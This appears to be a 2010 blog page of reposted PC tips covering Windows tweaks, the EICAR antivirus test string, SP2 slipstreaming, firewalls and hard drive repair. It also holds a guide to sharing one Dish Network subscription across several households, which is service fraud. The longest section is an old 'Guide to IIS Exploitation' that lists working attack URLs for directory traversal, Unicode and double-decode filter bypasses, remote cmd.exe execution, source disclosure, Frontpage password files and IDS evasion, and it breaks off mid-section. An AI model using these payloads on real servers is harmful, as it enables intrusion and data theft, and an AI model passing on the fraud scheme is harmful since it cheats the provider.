Sunday, April 4, 2010

How Do U See Hidden Files, Using DOS..

Do U See Hidden Files, Using DOS..

 Simple and useful tip
******************
at command prompt just type
dir /ah
if the list is too long u can use
dir /ah/p/w
*******************

How do I Test My VirusScan Installation

How do I Test My VirusScan Installation

How do I Test My VirusScan Installation? (Eicar)

Description

After installing VirusScan, you may logically wonder, how do I know if it's working? The answer is a test virus. The EICAR Standard AntiVirus Test File is a combined effort by anti-virus vendors throughout the world to implement one standard by which customers can verify their anti-virus installations.

Solution

To test your installation, copy the following line into its own file, then save the file with the name EICAR.COM. More detailed instructions are found below.

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

The file size will be 68 or 70 bytes.

If VirusScan is running and configured correctly, when you try to save the file, VirusScan will detect the virus. If VirusScan is not running, start it and scan the directory that contains EICAR.COM. When your software scans this file, it will report finding the EICAR test file.

Note that this file is NOT A VIRUS. Delete the file when you have finished testing your installation to avoid alarming unsuspecting
users.

The eicar test virus is available for download from the following website:
http://www.eicar.org/download/eicar.com

Creating Eicar.com

   1. Click on Start.
   2. Select Run.
   3. In the Open box type: notepad
   4. Maximize the window.
   5. Highlight the following on the following line of text:
      X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
   6. Right click on the highlighted text and choose 'copy'.
   7. Switch back to Notepad.
   8. Right click anywhere inside of Notepad and select 'paste'.
   9. Click the File menu and select 'save as'.
  10. Change the 'Save as Type' to 'all files'.
  11. Name the file eicar.com.

How do I remove an extra operating system from by

How do I remove an extra operating system from by

If you have more then one operating system installed or wish
to remove an operating system from the boot menu, you can use the following information.

1.Click on Start, Control Panel, System, Advanced.
2.Under Startup and Recovery, click Settings.
3.Under Default Operating System, choose one of the following:

"Microsoft Windows XP Professional /fastdetect"
-or-
"Microsoft Windows XP Home /fasdetect"
-or-
"Microsoft Windows 2000 Professional /fastdetect"

4.Take the checkmark out of the box for "Time to display a list of Operating Systems".
5.Click Apply and Ok, and reboot the system.

*If you wish to edit the boot.ini file manually, click on the button "EDIT"

How do I overburn a CD with Nero

How do I overburn a CD with Nero

How do I overburn a CD with Nero?

 Start Nero

From the action-bar select File and select Preferences.



In the Preferences window, select Expert Features(1) and check the Enable overburn disc-at-once(2).



Choose a Maximum CD Length(3) and click OK(4) (*82:59:59 is the maximum value I suggest, but as you can see from the screen capture above I have set mine significantly higher. The reason is because I frequently use 99min 850 MB CD media).

For a more accurate test you can use a nero tool called nero speed test to see how much a specific CD is capable of being overburned . get it here

From the action-bar select File and select Write CD.



A window will appear when you have exceeded expected length, click OK to start the overburn copy.

Remember to set disk to burn Disc at Once, you cannot overburn in Track at Once Mode.

How 2 Find EVERYTHING uploaded on Rapidshare

How 2 Find EVERYTHING uploaded on Rapidshare

2 Find EVERYTHING uploaded on Rapidshare

All rapidshare.de Downloads:
/http://www.google.com/search?hl=en&lr=&as_qdr=all&q=+.*+site%3Arapidshare.de

Apps Rapidshare.de Downloads:
/http://www.google.com/search?hl=en&lr=&as_qdr=all&q=.cab+OR+.exe+OR+.rar+OR+.zip+site%3Arapidshare.de&btnG=Search

Movies rapidshare.de Downloads:
/http://www.google.com/search?hl=en&lr=&as_qdr=all&q=+.Avi+OR+.mpg+OR+.mpeg+site%3Arapidshare.de&btnG=Search

Hide Drives and Partitions

Hide Drives and Partitions


Hide Drives and Partitions

Do you have data on a partition or hard drive that you don't want tampered with or easily accessible to other users? Well, you can hide any drive/partition in Windows XP, NT, and 2000. That means that they won't show up in Explorer or My Computer.

If you want access to that drive from your user account you should create a desktop shortcut before proceeding. Once hidden, you can still access by typing the drive letter and a colon in Start/Run—for example, "D:" will bring up a folder of the contents on your D drive.

The easiest way with Win XP is to use the TweakUI power toy from Mcft. Go to Start/Run and type in "tweakui" (without the quotes).

Go to My Computer/Drives and uncheck the drive/partition(s) you want hidden. Click "Apply" or "OK" when finished.

If you have XP but not Tweak UI you can download it here...
http://www.Mcft.com/windowsxp/downloads/powertoys/xppowertoys.mspx

For Win NT, 2000, and XP you can use the following Registry edit:

*Be sure to back up the Registry before proceeding
http://www.worldstart.com/tips/tips.php/401

Open the Registry Editor by going to Start/Run and typing in "regedit" (without the quotes). Find your way to...

HKEY_CURRENT_USER\Software\Mcft\Windows\CurrentVersion\Policies

Click on "Explorer".

Double-click the "NoDrives" key in the right column. If you don't find a "NoDrives" registry key, just right-click in the right pane and choose "New/DWORD Value" then name the key "NoDrives".

You'll see a value like "0000 00 00 00 00". This is where the fun starts. The four sets of double zeros (after the "0000") are where you'll enter the values for the drive/partitions. Now, stay with me on this—it's not as complicated as it sounds:

The first column is for drives A-H, the second for I-P, the third for Q-X, and the fourth for Y-Z.

The values for each drive are as follows:

1 - A I Q Y
2 - B J R Z
4 - C K S
8 - D L T
16 - E M U
32 - F N V
64 - G O W
80 - H P X

So, let's say you want to hide drive D. In the first column you would put "08". For drive K you would put "04" in the second column.

But what if you want to hide more than one drive in a column? Simply add the values together: D+E = 8+16 = 24. So in the first column you would put "24".

Still baffled? If you have XP then go get TweakUI and save yourself the math.

Whichever method you use, you can rest easy knowing that the files on that drive or partition are less accessible to other users.

Hex, How to turn binary or decimal to hex

Hex, How to turn binary or decimal to hex


First go to http://www.shareordie.com/forum/index.php?showtopic=3269 to learn binary.

OK, 1,453,752 is 101100010111010111000 is binary, now we turn it into a Hex number.

First Hex numbers goes like this:
1=1
2=2
.
.
9=9
10=A
11=B
12=C
13=D
14=E
15=F

Now you need to take the first octet (the far right 4) and place it under this little grid:

8 4 2 1
--------
1 0 0 0 = 8

See the 1 under the 8 column?
That is what you add.

So the next octet is 1011, put it under the grid:

8 4 2 1
--------
1 0 0 0 = 8
1 0 1 1 = B

See 8+2+1=11, so you can't just say 11 you have to put it in a Hex number, which is B.
So the full Hex number of 1,453,752 is:

8 4 2 1
--------
1 0 0 0 = 8
1 0 1 1 = B
1 1 1 0 = E
0 0 1 0 = 2
0 1 1 0 = 6
0 0 0 1 = 1 <-- Just add zero if it isn't a full octet

162EB8

So if you want to turn a number in to the shorter version of Hex, just turn it into binary, then use this grid and you'll do fine



P.S. Thanks Korrupt for the number to work with

have satallite tv for almost free IF not free!!!

have satallite tv for almost free IF not free!!!

have satallite tv for almost free IF not free!!!

this is a tut by me that i use at home to get all the channels "not including ppv" for almost free if not free... i have every single channel that dish network offers and i dont pay a single dollar..... ok this is how it goes...
-----------------------------------

Get a dish 500 no matter how… “buy /steal”
Sign up with dish network for like “top 100” that will give you like 100 channels… it would cost you like 29.99 or 39.99 not sure…
Then you need to find 3 friends… or parent friends that are interested in having satellite TV….
Dish network allows you to have up to 4 receivers in one house with no prob.
So the next day, or when ever you find a person or 3 of them… call the dish company and tell them that you would like to activate your 2nd receiver and would like to add some additional channels… for that you would need “receiver # and smart card # of that new receiver that is at your friends house” so you give them the info and they hook the second receiver up… just don’t tell them that the receiver is not in the house…
They will hook up to 3 more receivers per account and when you get all 4 receivers you can get all channels on them and just split your bill between the other 3 people that are using your subscription…
For me it works perfectly… I live in Oregon and I have a receiver in my friends’ house in Washington and two in California USA.
I don’t know if this thing would work anywhere else but it sure works for me

Have Notepad In Send To

Have Notepad In Send To


Have Notepad In Send To



Many apply a registry tweak to have notepad as an option for unknown file types. We frequently see such files which are actually just text, but named with some odd file-extension. And then, some suspicious files which we want to make sure what the contents are. Well, in such cases where the registry tweak is applied, the downside happens to be that even some known files get associated with notepad - but no, all we want is to be able to open a file with notepad - the association part in such cases is unwanted interference. Also, notepad becomes a permanent fixture on the right-click menu - which is again an annoyance.

So what we do, is to have notepad as an option in the Send-To options, of the right-click menu in explorer. It fulfils the purpose to perfection (atleast, in my case). Here's what we do:

1. right-click desktop, choose "New >> Shortcut"
2. Type the location of the item - "notepad" - (that's all, no need to give path)
3. Next >> type name for shortcut - "Edit with Notepad"
4. Click finish
5. Now right-click this shortcut on the desktop, and choose properties.
6. Confirm that the "target" and "start in" fields are using variables - "%windir%\system32\notepad.exe" - (absolute paths will be problematic if you use this .LNK on machines other than your own)
7. Now, browse to "%UserProfile%\SendTo" in explorer (which means "C:\Documents and Settings\User_Name\SendTo\" folder)
8. And copy the "Edit with Notepad.lnk" file which you already created, to that folder.
9. So now, you can right-click on ANY file-type, and be offered an option to open with notepad, from the SendTo sub-menu.

So now, you just right-click on an .nfo or .eml or .diz file (which are associated with other programs, and are sometimes just plain-text files), and choose "Send To >> Edit with Notepad" and it will open in notepad!
No more botheration of applying registry tweaks for something as simple as this.

Hardware Firewall

Hardware Firewall

The best firewall is a hardware firewall that is completely separate from your operating system. It need not be a dedicated router, could be an old pentium box running Linux. Below I have found some sites that have How To's on setting up an outside hardware router using an old computer and using a little linux program that fits on a single floppy disk.

Brief Description:
floppyfw is a router with the advanced firewall-capabilities in Linux that fits on one single floppy disc.

Features:
Access lists, IP-masquerading (Network Address Translation), connection tracked packet filtering and (quite) advanced routing. Package for traffic shaping is also available.
Requires only a 386sx or better with two network interface cards, a 1.44MB floppy drive and 12MByte of RAM ( for less than 12M and no FPU, use the 1.0 series, which will stay maintained. )
Very simple packaging system. Is used for editors, PPP, VPN, traffic shaping and whatever comes up. (now this is looking even more like LRP (may it rest in peace) but floppyfw is not a fork.)
Logging through klogd/syslogd, both local and remote.
Serial support for console over serial port.
DHCP server and DNS cache for internal networks.

floppyfw


h#tp://www.zelow.no/floppyfw/



Sentry Firewall CD-ROM is a Linux-based bootable CDROM suitable for use as an inexpensive and easy to maintain firewall, server, or IDS(Intrusion Detection System) Node. The system is designed to be immediately configurable for a variety of different operating environments via a configuration file located on a floppy disk, a local hard drive, and/or a network via HTTP(S), FTP, SFTP, or SCP.

The Sentry Firewall CD is a complete Linux system that runs off of an initial ramdisk, much like a floppy-based system, and a CD. The default kernel is a current 2.4.x series kernel with various Netfilter patches applied. An OpenWall-patched current 2.2.x kernel is also available on the CD.

Booting from the CDROM is a fairly familiar process. The BIOS execs the bootloader(Syslinux) - which then displays a bootprompt and loads the kernel and ramdisk into memory. Once the kernel is running, the ramdisk is then mounted as root(/). At this point our configuration scripts are run(written in perl) that configure the rest of the system. It is the job of these configure scripts to put the various startup and system files into the proper location using either what is declared in the configuration file(sentry.conf) or the system defaults located in the /etc/default directory.

Most of the critical files used at boot time can be replaced with your own copy when declared in the configuration file. This is essentially how we allow the user to configure the system using his/her own configuration and init files.

All of the binaries, files, scripts, etc, used to create the CD-ROM are also available on the CD-ROM. So, with a little practice, you can easily build and customize your own bootable Sentry Firewall CD. Please see the HOWTO for more details.


Sentry Firewall


ht*p://www.sentryfirewall.com/docs.html#overview

Hard drive Gone Bad

Hard drive Gone Bad


Hard drive gone bad

The most common problems originate
from corruption of the master boot record, FAT, or directory.
Those are soft problems which can usually be taken care of
with a combination of tools like Fdisk /mbr to refresh the
master boot record followed by a reboot and Norton disk doctor
or Spinneret.

The most common hardware problems are a bad controller, a bad
drive motor, or a bad head mechanism.

1. Can the BIOS see and identify the hard drive correctly? If
it can't, then the hard drives onboard controller is bad.

2. Does the drive spin and maintain a constant velocity? If it
does, that's good news. The motor is functioning.

3. If the drive surges and dies, the most likely cause is a
bad controller (assuming the drive is cool). A gate allowing
the current to drive the motor may not be staying open. The
drive needs a new controller.

4. Do you hear a lot of head clatter when the machine is
turned on and initialized (but before the system attempts to
access the hard drive). Head clatter would indicate that the
spindle bearings are sloppy or worn badly. Maybe even lose and
flopping around inside.

5. There is always the possibility that the controller you are
using in the machine has gone south.

1. If the drive spins, try booting to the A> prompt, run Fdisk
and check to see if Fdisk can see a partition on the hard
drive. If Fdisk can see the partition, that means that it can
access the drive and that the controller electronics are
functioning correctly. If there is no head clatter, it may be
just a matter of disk corruption which commonly occurs when a
surge hits you machine and overwhelms the power supply voltage
regulator. It commonly over whelms the system electronics
allowing an EM pulse to wipe out the master boot record, file
allocations table, and primary directory. Fdisk can fix the
master boot record and Norton Disk Doctor can restore the FAT
and Directory from the secondaries.
2. The drive spins but Fdisk can't see it. Try the drive in
another system and repeat the test to confirm that Fdisk can't
read through the drives onboard controller. If it sees it in
another system, then your machines hard drive interface is
bad. You can try an upgraded or replacement controller card
like a Promise or CMD Technologies (there are others) in you
machine after disabling the integrated controller in the BIOS,
but if the integrated controller went south, it may just be
symptomatic of further failures and you'd be wise to replace
the motherboard. Trying the drive in another machine also
eliminates the variable that your machines 12 volt power
output being bad

3. If you get head clatter but a constant velocity on the
drive motor (no surging), you might try sticking the hard
drive in the freezer for about 12 hours. This is an old trick
from back in the days of the MFM/ESDI driver era. This can
cause the drive components to shrink enough to make the track
marker align with the tracks. We don't see that kind of
platter spindle wear much anymore, but back in the old days,
the balancing and bearings weren't as good. Still, under the
right circumstances, it might help. It would depend on how old
the drive is and how many hours of wear have occurred. You
have to be quick to get your info off the drive when it works.
Back then, the drives were much smaller, so there wasn't so
much to copy. So, go after the important data first.

4. The drive doesn't spin. Either the onboard controller is
bad or the motor is bad (assuming you did try the drive in
another machine). It's time to hit the net and local
independent shops to see if you can locate another drive of
the same make and model that's good. Since the drive is
probably an older drive and no longer in distribution, your
best bet is to find an identical used drive. If you know
someone with the same make and model, you might be wise to try
and persuade them to sell you their drive with an offer of
providing them with a free upgraded drive. If you can locate
an identical drive, start with the controller replacement ...
this is the simplest and least invasive. If swapping the
controller doesn't produce the desire result, you can tear
into the drive and swap the motors. While you have both drive
opened up to accomplish this, scrutinize the platters, heads
and armatures. You might even hook the drive up and power it
from a system with both drives attached. This way, you could
see anything that deviates between the actions of both drives
when they are initialized. Swapping patters is unlikely to
produce any positive result. They are a balanced system like
the tires on your car and I suspect that the balance will be
different for each drive as will other variables.

5. There's always Ontrack Corp. who will attempt to recoup
your info starting at $500 and going up from there. They don't
fix and return the drive either.

If the info is all that important to you, I would seek some
professional and experience technician in your locality who
makes his living from servicing and building computer systems
... not just selling them. If you have had much experience
salvaging information from bad hard drives, your likelihood of
success is low. In the case of soft corruption, all utilities
have their eccentricities. Often times, Norton Disk Doctor
will go too far (if you let it). It's wise to just let those
utilities small steps and then have a look at the drive and
see if you can copy it off. Norton will go so far as to rename
directories and files, and even delete them or break them up
into fragments which are useless.
_________________

Guide to Slipstreaming Service Pack 2

Guide to Slipstreaming Service Pack 2

DarkLegacy's Guide to Slipstreaming Service Pack 2

Note: All images are hosted with ImageShack.

• This guide will allow you to sucsessfully install Service Pack 2 on the original (gold) code of Microsoft Windows XP.
• The version of Windows you have purchased/downloaded does not matter as far as slipstreaming (they're all the same anyway).

Things you need:
• Microsoft Windows XP (duh :P)
• Service Pack 2:

URL http://download.microsoft.com/download/1/6/5/165b076b-aaa9-443d-84f0-73cf11fdcdf8/WindowsXP-KB835935-SP2-ENU.exe

• Windows XP Boot sector:

http://www.neowin.net/downloads/xpboot.bin

• Nero Burning Rom (find it on SoD)

Step One

Insert the Microsoft Windows XP CD into your CD-ROM drive, and create a new folder on your hard-drive labelled "CD".

Copy all of the files from the Windows XP CD to the "CD" folder.




Step Two

Download Service Pack 2 and place it within the root of your hard-drive.
Ex: C:\ D:\ etc..



Step Three

Go to Start -> Run and type in "F:\WindowsXP-KB835935-SP2-ENU.exe -s:F:\CD" (depending on where you put the folder)

The actual command is -s:drive:\folder



Step Four

The Service Pack 2 updater will automatically slipstream Service Pack 2 into your "CD" folder.




Step Five

If you browse back to the CD folder, you'll notice that new folders and files appeared from the SP2 update. At this point, you can include any software you wish onto this CD, but make sure that the size of the folder does not exceed the media you are burning on. If you're not sure, a regular CD is 700 megabytes.



Step Six

Go to Start and Search for files and folders. Go to all files and folders, and type in "wpa.dbl". This is the activation file for your current installed version of XP. Make a copy of the file and paste it into your CD folder.



Step Seven

Open up Nero Smartstart, and click on the icon that looks like two people. This turns the program into "professional mode". Search for create a bootable CD. Click on it, and make sure that your settings agree with the following picture; also make sure that you downloaded the Windows XP boot sector.



Step Eight

Continue onto the next tab, and make sure that your settings agree with the picture:



Step Nine

In this step, you can label your CD whatever the hell you want. I recommend WXPSP2_EN.


Step Ten

Go to "new" and locate your CD folder. Drag all of the files in the CD folder to the compilation window on the right, and nero will calculate how much disk space was used. If it exceeds 700 MB, get rid of some programs that you added to the CD. If you didn't add anything; just push burn.


Step Eleven

Make sure that your settings check with the picture:



Step Twelve

Just push burn, and that's it! Congradulations, you just made a bootable Win XP CD with SP2 slipstreamed!

Guide to IIS Exploitation

Guide to IIS Exploitation

***************************************************************************
*                      Guide to IIS Exploitation                          *
*                            by fugjostle                                 *
*                                                                         *
*                             V.1.0.1                                     *
*                                                                         *
*          Questions? Comments? Email: fugjostle at ch0wn.com             *
***************************************************************************

    Disclaimer: I do not condone hacking IIS servers in any way,
                shape or form. This guide is intended as a guide
                for admins to help them understand what most
                script kiddies don't understand but are happy to
                exploit.


--[On the first day, God created directory traversal]

Relative paths are the developers friend. They allow an entire website to
be moved to another directory without the need for changing all the links
in the html. For example, lets say we have a webpage called 'pictures.html'
in the htdocs dir:

  Absolute path:  /home/webpages/htdocs/pictures.html
  Absolute path:  /home/webpages/images/pic1.gif

In the html you can refer to the 'pic1.gif' via an absolute path shown
above or use a relative path:

  Relative path: ../images/pic1.gif

The relative path tells the server that it has to go to the parent
directory (dot dot) -->  from /home/webpages/htdocs to /home/webpages. Then
the server goes into the images dir and looks for the gif file to display.

Anyone who has used the 'cd' command in DOS and *nix should be familiar
with the operation. So what's the problem I hear you ask... well, the
programmers of web server didn't think to check the supplied URL to ensure
that the requested file was actually in the web directory. This allows
someone to backtrack through the servers directory structure and request
files that the web server has access to. For example,

  http://www.target.com/../../../etc/passwd

NB. you can also use double dots and double quotes. This is useful to evade
Intrusion Detection Systems (IDS):

  http://www.target.com//....//....//...././etc/./passwd

The webserver simply strips the extra stuff out and processes the request.
This is the same as the previous example and can make string matching IDS's
work for their money.


--[On the second day, God created Hexadecimal]

Once programmers started to realise the mistake they began to create parser
routines to check for naughty URL's and keep the requests within the
document root. Then along comes a wiley hacker who wonders if by encoding
the URL will it still be recognised by the parser routines.

You may have noticed that when you enter a URL that includes a space it is
replaced with the hex equivalent (%20):

  http://www.target.com/stuff/my index.html

  becomes

  http://www.target.com/stuff/my%20index.html

and voila, it works. So what would happen if we changed the now denied URL:

  http://www.target.com/../../../etc/passwd

  to

  http://www.target.com/%2e%2e/%2e%2e/%2e%2e/etc/passwd

The parser routine checks for the existence of dots in the path and finds
none... the webserver then proceeds with the request.

An interesting feature is that you can encode the hex symbol  and the web
server will decode it all for you. This is called the "double decode".
For example, given the URL "http://victim.com/..%252f..%252fdocs/", the
following will take place:

(1) On the first decode, the string will be converted to:

  "http://victim.com/..%2f..%2fdocs/"

  [%25 = '%' so '%252f' is decoded to '%2f']

(2) On the second decode, the string will be converted to:

  "http://victim.com/../../docs/"

  [%2f = '/']


--[On the third day, God created Unicode]

The World Wide Web is a global phenomenon and as such needs to be globally
interoperable. This raised the question of how to deal with all the different
character sets around the world. As a response to this, Unicode was created:

   -----------------------------------------------------------------
   Unicode provides a unique number for every character, no matter
   what the platform, no matter what the program, no matter what
   the language. The Unicode Standard has been adopted by such
   industry leaders as Apple, HP, IBM, JustSystem, Microsoft,
   Oracle,SAP, Sun, Sybase, Unisys and many others. Unicode is
   required by modern standards such as XML, Java, ECMAScript
   (JavaScript), LDAP, CORBA 3.0, WML, etc., and is the official
   way to implement ISO/IEC 10646. It is supported in many operating
   systems, all modern browsers, and many other products.
   -----from http://www.unicode.org---------------------------------


The problem with Unicode is that it requires 16 bits for a single character
and software tended to use 8 bits for a single character. Unicode TransForm
using 8 bits (UTF-8) was created. This allows for multibyte encoding where a
variable number of bytes can be used for each character:

  Character  1-byte  2-byte  3-byte
   .         2E      C0 AE   E0 80 AE
   /         2F      C0 AF   E0 80 AF
   \         5C      C1 9C   E0 81 9C

This lead to a new vulnerability in certain webservers. The parser didn't
understand this new encoding and allowed it through :-)

For example:

  www.target.com/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/etc/passwd

Recent vulnerabilities have been taking advantage of the fact that the web
server doesn't understand the Unicode UTF-8 character set but the underlying
OS does:

  www.target.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c%20dir

Understanding the distinction between Unicode and UTF-8 can be difficult. As
a general rule of thumb you can use the following format as a guide:

  %uxxxx          = Unicode
  %xx%xx          = UTF-8
  %xx             = Hexidecimal
  %xxxx           = Double Decode

--[On the fourth day, God created default installs]

IIS comes installed with various DLL's (Dynamic Link Libraries) that
increase the functionality of the web server. These ISAPI (Internet Server
API) applications allow programmers/developers to deliver more functionality
to IIS.

The DLL's are loaded into memory at startup and offer significant speed
over traditional CGI programs. For example, they can be combined with the
Internet Database Connector (httpodbc.dll) to create interactive sites that
use ODBC to access databases.

The problem is that some of these DLL's are insecure and are often installed
with sample scripts that demonstrate how to exploit, erm, I mean use them.

ASP.DLL is used to pre-process requests that end in ".asp". ASP (Active
Server Pages) are basically HTML pages with embedded code that is processed
by the webserver before serving it to the client.

Here's some examples to illustrate how the sample pages installed by default
can aid someone breaking into your site via the ASP.DLL:
[prefix all the examples with http://www.target.com]

  /default.asp.

   ** Appending a '.' to the URL can reveal the source
   ** on older systems. Remember hex encoding? You can
   ** also try using %2e to do the same thing.

  /msadc/samples/adctest.asp

   ** This gives you an interface into the msadcs.dll
   ** and allows creation of DSN's. Read RFP's stuff
   ** for idea's on how to exploit this.

  /iissamples/exair/howitworks/codebrws.asp?source=/msadc/Samples/../../.../../../../boot.ini
  /msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../.../boot.ini

   ** You can view the source of anything in the
   ** document root. '/msadc/' needs to be in the
   ** request as it is checked for, wait for this,
   ** security :-)

  /index.asp::$DATA

   ** Appending '::$DATA' to the URL can reveal
   ** the source of the ASP.

  /index.asp%81
 
   ** Append a hex value between 0x81 and 0xfe
   ** and you can reveal the source of any server
   ** processed file. This only works on servers
   ** that are Chinese, Japanese or Korean.

  /AdvWorks/equipment/catalog_type.asp?ProductType=|shell("cmd+/c+dir+c:\")|

   ** This one allows you to execute remote
   ** shell commands ;-)

ISM.DLL is used to process requests that end in ".htr". These pages were used
to administer IIS3 servers. In IIS4 they are not used but various .htr samples
are installed by default anyway and offer another avenue for entry.

  /index.asp%20%20%20..(220 more)..%20%20.htr

   ** IIS will redirect this request to ISM.DLL,
   ** which will strip the '.htr' extension and
   ** deliver the source code of the file.
 
  /global.asa+.htr

   ** Does the same thing as the %20%20 exploit
   ** above. ISM.DLL strips the +.htr and delivers
   ** you the source of the file

  /scripts/iisadmin/ism.dll?http/dir

   ** Excellent brute force opportunity if the
   ** dll exists. Successful logons will reveal
   ** lots of useful stuff.

  /iisadmpwd/aexp.htr

   ** The iisadmpwd diectory contains several .htr
   ** files that allow NetBIOS resolution and
   ** password attacks.

  /scripts/iisadmin/bdir.htr??c:\inetpub\www

   ** This method will only reveal directories
   ** but can be useful for identifying the
   ** servers structure for more advanced
   ** attacks later.

MSADCS.DLL is used to allow access to ODBC components via IIS using RDS
(Remote Data Service). RDS is part of the default install of Microsoft Data
Access Components (MDAC) and is a commonly exploited on IIS. It can allow
arbitrary shell commands to be executed with system privileges.

  /msadc/msadcs.dll

   ** If this file exists then there's a pretty
   ** good chance that you can run the RDS
   ** exploit again the box. More on this later.

HTTPODBC.DLL is the Internet Connector Database (IDC) and used when the web
server wants to connect to a database. It allows the creation of web pages
from data in the database, and it allows you to update/delete items from
within webpages. Pages with the extension '.idc' are sent to the HTTPODBC.DLL
for processing.

  /index.idc::$DATA

   ** Appending '::$DATA' to the URL can reveal
   ** the source of the IDC.

  /anything.idc
 
   ** Requesting a non-existance file will
   ** reveal the location of the web root.

  /scripts/iisadmin/tools/ctss.idc

   ** Creates a table based on the parameters it
   ** receives. Excellent place to look at for
   ** SQL injection.

SSINC.DLL is used for processing Server Side Includes (SSI). '.stm',
'.shtm' and '.shtml' extension are sent to the DLL which interprets
the SSI statements within the HTML before sending it to the client.

An example of SSI would be:

 

This SSI tells the server to include the 'news.txt' in the final HTML
sent to the use. SSI statements are beyond the scope of this document
but offer another security hole open to our wiley hax0r. Ensure you
remove the app mapping and disable SSI if you do not require its
functionality.

SSINC.DLL is also vulnerable to a remote buffer overflow, read the
following advisory for details:

  http://www.nsfocus.com/english/homepage/sa01-06.htm

Some examples of SSINC.DLL fun:

  /anything.stm

   ** If you request a file that doesn't exist
   ** then the server error message contains the
   ** the location of the web root.

  /somedir/anything.stm/somedir/index.asp

   ** Using this method allows you to view the
   ** the source code for index.asp.
 
IDQ.DLL is a component of MS Index Server and handles '.ida' and '.idq'
requests. This DLL has had some big exposure with the recent Nimda worm.
I'm not going into too much detail but '.ida' was used in a buffer
overflow that resulted in user defined code being executed on the server.

  /anything.ida or /anything.idq
 
   ** Requesting a non-existance file will
   ** reveal the location of the web root.

  /query.idq?CiTemplate=../../../boot.ini

   ** You can use this to read any file on
   ** the same drive as the web root

CPSHOST.DLL is the Microsoft Posting Acceptor. This allows uploads to your
IIS server, via a web browser or the Web Publishing Wizard. The existance of
this DLL can allow attackers upload files to the server. Other files such as
uploadn.asp, uploadx.asp, upload.asp and repost.asp are installed with Site
Server and allow upload of documents to the server:

  /scripts/cpshost.dll?PUBLISH?/scripts/dodgy.asp

   ** If this file is there then you may be able
   ** to upload files to the server.

  /scripts/uploadn.asp
 
   ** Connecting to this page gives you a nice
   ** gui for uploading your own webpages. You
   ** probably need to brute the userid.

There are lots more example scripts in the default install and quite a few
of them are very, very insecure. Microsoft recommends that you remove ALL
samples from any production server including the ExAir, WSH, ADO and other
installed samples.

  IIS Default Web Site
  --------------------
  IISSAMPLES  - c:\inetpub\iissamples
  IISADMIN    - c:\winnt\system32\inetsrv\issadmin
  IISHELP     - c:\winnt\help
  SCRIPTS     - c:\inetpub\scripts
  IISADMPWD   - c:\winnt\systems32\inetsrv\iisadmpwd
  msadc       - c:\program files\common files\system\msadc
  logfiles    - c:\winnt\system32\logfiles
  default.htm - c:\inetpub\wwwroot

  IIS Default App Mapping
  -----------------------
  .asa   - c:\winnt\system32\inetsrv\asp.dll
  .asp   - c:\winnt\system32\inetsrv\asp.dll
  .cdx   - c:\winnt\system32\inetsrv\asp.dll
  .cer   - c:\winnt\system32\inetsrv\asp.dll
  .htr   - c:\winnt\system32\inetsrv\ism.dll
  .idc   - c:\winnt\system32\inetsrv\httpodbc.dll
  .shtm  - c:\winnt\system32\inetsrv\ssinc.dll
  .shtml - c:\winnt\system32\inetsrv\ssinc.dll
  .stm   - c:\winnt\system32\inetsrv\ssinc.dll


--[On the fifth day, God created Frontpage Extensions]

Microsoft Frontpage (Originally developed by Vermeer Tech Inc, if you've
ever wondered why they use _vti_) is a web design tool that helps you
create and maintain a web site and allows you to publish it to the web
server.

In order to publish using Frontpage the server needs to run certain
programs, collectively called the Frontpage Server Extensions.

Sounds good I hear you say, but there are many, many security holes in
Frontpage. You can list all the files, download password files and upload
your own files on Frontpage enabled sites.

When you publish a file, Frontpage attempts to read the following URL to
get all the information it needs to publish:

  http://www.myserver.com/_vti_inf.html

Then Frontpage uses the following URL to POST the files to the site:

  http://www.myserver.com/_vti_bin/shtml.exe/_vti_rpc

It will come as no surprise that this file is not protected and open to
abuse.

All information for the site is stored in the /_vti_pvt/ dir, and its world
readable. Here's some of the things you can look for:

  http://www.myserver.com/_vti_pvt/administrators.pwd
  http://www.myserver.com/_vti_pvt/authors.pwd
  http://www.myserver.com/_vti_pvt/service.pwd
  http://www.myserver.com/_vti_pvt/shtml.dll
  http://www.myserver.com/_vti_pvt/shtml.exe
  http://www.myserver.com/_vti_pvt/users.pwd
  http://www.myserver.com/_private


--[On the sixth day, God created CGI]--

The Common Gateway Interface (CGI) is a standard for interfacing external
applications to the web server. A CGI program is excuted in real time and
is used to create dynamic web sites.

Generally, the CGI programs are kept in '/cgi-bin/' but can be placed
anywhere. The programs can be written most languages but typically they are
written in C, Perl or shell scripts.

Many sites will use freely available, downloadable scripts from places like
Matt's Trojan, erm, I mean Matt's Script Archive. Its always a good idea to
look through the source of the scripts for bad system calls and lax input
validation.

CGI deserves a tutorial all to itself and I strongly suggest that you read
the following tutorials... they explain it better than I ever could:

  Hacking CGI       - http://shells.cyberarmy.com/~johnr/docs/cgi/cgi.txt
  Perl CGI Problems - http://www.phrack.com/phrack/55/P55-07

Just to get you in the mood we will have a brief look at CGI exploitation.
There are three main types of CGI hacking; URL encoding attacks, input
validation exploits and buffer overflows.

The first thing to keep in mind is that you are already able to exploit cgi
using the techniques from previous sections. First, we need to cover some
background. CGI can take lots of shapes and forms. One popular use is via
web based forms that submit information to a CGI via a GET or POST.

 


When the user clicks on the submit button his information is passed to the
CGI script to process either via the URL (GET) or via HTTP headers (POST).
Lets assume that the CGI we are going to exploit asks the user for the name
of a file to display. The 'GET' method uses the URL to pass the information
and it would look like this:

  http://www.target.com/cgi-bin/my_cgi.cgi?filename=/etc/passwd

Lets break that down:

  ?            - separates the request from the parameters
  filename     - this is the name of the textbox in the html
  =            - assignment for the parameter/value pair
  /etc/passwd  - this is what the user typed into the box

You can have multiple fields within a HTML form and these will also be
passed to the CGI. They are separated using a '&':

  http://www.target.com/cgi-bin/my_cgi.cgi?filename=/etc/passwd&user=fugjostle

If you were thinking how could you alter the user supplied input to break
the CGI then good, you're starting to think in terms of security. Lots of
developers love to program new and interesting things but they do not
consider security. A security conscious programmer would write input
validation routines that would process the data and ensure the user wasn't
be malicious or curious.

As you read through some of the free scripts on the web you will start to
realise that many programmers do not think about security. Lets look briefly
at some ways we could exploit the CGI. The first thing to keep in mind is
that you already know the generic exploits from the previous section. The
only area in which we are lacking is programming language specific info.

We will stick with the example cgi that open's a file (and let's assume
its written Perl). Lets look at some of the things we can try:

  my_cgi.pl?filename=../../../../../etc/passwd
